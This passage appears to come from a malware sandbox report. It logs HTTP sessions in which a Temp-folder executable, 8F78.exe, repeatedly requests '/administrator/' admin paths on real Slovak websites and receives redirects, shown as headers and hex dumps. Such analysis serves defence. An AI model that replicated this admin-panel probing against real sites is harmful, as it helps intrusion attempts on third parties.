                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Set-Cookie: NSID=ylcnnah5yj0tfd94d14da4a70w; path=/; domain=.kompresory-servis.sk; HttpOnly
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                Location: https://www.kompresory-servis.sk/administrator
                                                                                                                                                                                                                                                                                                                                X-Worker: cloud-494
                                                                                                                                                                                                                                                                                                                                X-SSL: nginx
                                                                                                                                                                                                                                                                                                                                X-Cache-Status: NOCACHE
                                                                                                                                                                                                                                                                                                                                X-Powered-By: BizWebs
                                                                                                                                                                                                                                                                                                                                X-Boot: @hturl


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                90192.168.2.45485683.167.249.7805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.342398882 CET188OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: www.kompresory-servis.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.594008923 CET564INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Location: http://www.kompresory-servis.sk/administrator
                                                                                                                                                                                                                                                                                                                                X-SSL: nginx
                                                                                                                                                                                                                                                                                                                                X-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                                                X-Powered-By: BizWebs
                                                                                                                                                                                                                                                                                                                                Data Raw: 66 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6b 6f 6d 70 72 65 73 6f 72 79 2d 73 65 72 76 69 73 2e 73 6b 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: fd<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.kompresory-servis.sk/administrator">here</a>.</p></body></html>0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.597717047 CET187OUTGET /administrator HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: www.kompresory-servis.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.857764006 CET472INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Set-Cookie: NSID=iuc2vqxdm0ybty34d14da4azws; path=/; domain=.kompresory-servis.sk; HttpOnly
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                Location: https://www.kompresory-servis.sk/administrator
                                                                                                                                                                                                                                                                                                                                X-Worker: cloud-495
                                                                                                                                                                                                                                                                                                                                X-SSL: nginx
                                                                                                                                                                                                                                                                                                                                X-Cache-Status: NOCACHE
                                                                                                                                                                                                                                                                                                                                X-Powered-By: BizWebs
                                                                                                                                                                                                                                                                                                                                X-Boot: @hturl


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                91192.168.2.45485483.167.249.7805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.342587948 CET188OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: www.kompresory-servis.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.594121933 CET564INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Location: http://www.kompresory-servis.sk/administrator
                                                                                                                                                                                                                                                                                                                                X-SSL: nginx
                                                                                                                                                                                                                                                                                                                                X-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                                                X-Powered-By: BizWebs
                                                                                                                                                                                                                                                                                                                                Data Raw: 66 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6b 6f 6d 70 72 65 73 6f 72 79 2d 73 65 72 76 69 73 2e 73 6b 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: fd<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.kompresory-servis.sk/administrator">here</a>.</p></body></html>0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.597913027 CET187OUTGET /administrator HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: www.kompresory-servis.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.857542992 CET472INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Set-Cookie: NSID=2mwjxy4oz59wf284d14da4aqop; path=/; domain=.kompresory-servis.sk; HttpOnly
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                Location: https://www.kompresory-servis.sk/administrator
                                                                                                                                                                                                                                                                                                                                X-Worker: cloud-494
                                                                                                                                                                                                                                                                                                                                X-SSL: nginx
                                                                                                                                                                                                                                                                                                                                X-Cache-Status: NOCACHE
                                                                                                                                                                                                                                                                                                                                X-Powered-By: BizWebs
                                                                                                                                                                                                                                                                                                                                X-Boot: @hturl


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                92192.168.2.45485083.167.249.7805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.342792988 CET188OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: www.kompresory-servis.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.597657919 CET564INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Location: http://www.kompresory-servis.sk/administrator
                                                                                                                                                                                                                                                                                                                                X-SSL: nginx
                                                                                                                                                                                                                                                                                                                                X-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                                                X-Powered-By: BizWebs
                                                                                                                                                                                                                                                                                                                                Data Raw: 66 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6b 6f 6d 70 72 65 73 6f 72 79 2d 73 65 72 76 69 73 2e 73 6b 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: fd<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.kompresory-servis.sk/administrator">here</a>.</p></body></html>0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.598051071 CET187OUTGET /administrator HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: www.kompresory-servis.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.860317945 CET472INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Set-Cookie: NSID=nlr85sp03y5esb04d14da4anqu; path=/; domain=.kompresory-servis.sk; HttpOnly
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                Location: https://www.kompresory-servis.sk/administrator
                                                                                                                                                                                                                                                                                                                                X-Worker: cloud-496
                                                                                                                                                                                                                                                                                                                                X-SSL: nginx
                                                                                                                                                                                                                                                                                                                                X-Cache-Status: NOCACHE
                                                                                                                                                                                                                                                                                                                                X-Powered-By: BizWebs
                                                                                                                                                                                                                                                                                                                                X-Boot: @hturl


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                93192.168.2.45485183.167.249.7805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.343940973 CET188OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: www.kompresory-servis.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.599244118 CET564INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Location: http://www.kompresory-servis.sk/administrator
                                                                                                                                                                                                                                                                                                                                X-SSL: nginx
                                                                                                                                                                                                                                                                                                                                X-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                                                X-Powered-By: BizWebs
                                                                                                                                                                                                                                                                                                                                Data Raw: 66 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6b 6f 6d 70 72 65 73 6f 72 79 2d 73 65 72 76 69 73 2e 73 6b 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: fd<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.kompresory-servis.sk/administrator">here</a>.</p></body></html>0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.599411011 CET187OUTGET /administrator HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: www.kompresory-servis.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.862993956 CET472INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Set-Cookie: NSID=n169jdbvoejs5z04d14da4amjr; path=/; domain=.kompresory-servis.sk; HttpOnly
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                Location: https://www.kompresory-servis.sk/administrator
                                                                                                                                                                                                                                                                                                                                X-Worker: cloud-494
                                                                                                                                                                                                                                                                                                                                X-SSL: nginx
                                                                                                                                                                                                                                                                                                                                X-Cache-Status: NOCACHE
                                                                                                                                                                                                                                                                                                                                X-Powered-By: BizWebs
                                                                                                                                                                                                                                                                                                                                X-Boot: @hturl


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                94192.168.2.45485283.167.249.7805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.343952894 CET188OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: www.kompresory-servis.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.598656893 CET564INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Location: http://www.kompresory-servis.sk/administrator
                                                                                                                                                                                                                                                                                                                                X-SSL: nginx
                                                                                                                                                                                                                                                                                                                                X-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                                                X-Powered-By: BizWebs
                                                                                                                                                                                                                                                                                                                                Data Raw: 66 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6b 6f 6d 70 72 65 73 6f 72 79 2d 73 65 72 76 69 73 2e 73 6b 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: fd<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.kompresory-servis.sk/administrator">here</a>.</p></body></html>0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.598917961 CET187OUTGET /administrator HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: www.kompresory-servis.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.862097025 CET472INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Set-Cookie: NSID=vue9lssc3iinddz4d14da4ariy; path=/; domain=.kompresory-servis.sk; HttpOnly
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                Location: https://www.kompresory-servis.sk/administrator
                                                                                                                                                                                                                                                                                                                                X-Worker: cloud-496
                                                                                                                                                                                                                                                                                                                                X-SSL: nginx
                                                                                                                                                                                                                                                                                                                                X-Cache-Status: NOCACHE
                                                                                                                                                                                                                                                                                                                                X-Powered-By: BizWebs
                                                                                                                                                                                                                                                                                                                                X-Boot: @hturl


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                95192.168.2.45485383.167.249.7805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.344224930 CET188OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: www.kompresory-servis.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.600289106 CET564INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Location: http://www.kompresory-servis.sk/administrator
                                                                                                                                                                                                                                                                                                                                X-SSL: nginx
                                                                                                                                                                                                                                                                                                                                X-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                                                X-Powered-By: BizWebs
                                                                                                                                                                                                                                                                                                                                Data Raw: 66 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6b 6f 6d 70 72 65 73 6f 72 79 2d 73 65 72 76 69 73 2e 73 6b 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: fd<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.kompresory-servis.sk/administrator">here</a>.</p></body></html>0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.600536108 CET187OUTGET /administrator HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: www.kompresory-servis.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.864275932 CET472INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Set-Cookie: NSID=dwj8cgpug7hnay04d14da4a9ff; path=/; domain=.kompresory-servis.sk; HttpOnly
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                Location: https://www.kompresory-servis.sk/administrator
                                                                                                                                                                                                                                                                                                                                X-Worker: cloud-495
                                                                                                                                                                                                                                                                                                                                X-SSL: nginx
                                                                                                                                                                                                                                                                                                                                X-Cache-Status: NOCACHE
                                                                                                                                                                                                                                                                                                                                X-Powered-By: BizWebs
                                                                                                                                                                                                                                                                                                                                X-Boot: @hturl


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                96192.168.2.45488146.229.230.81805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.625125885 CET172OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: rotas.sk
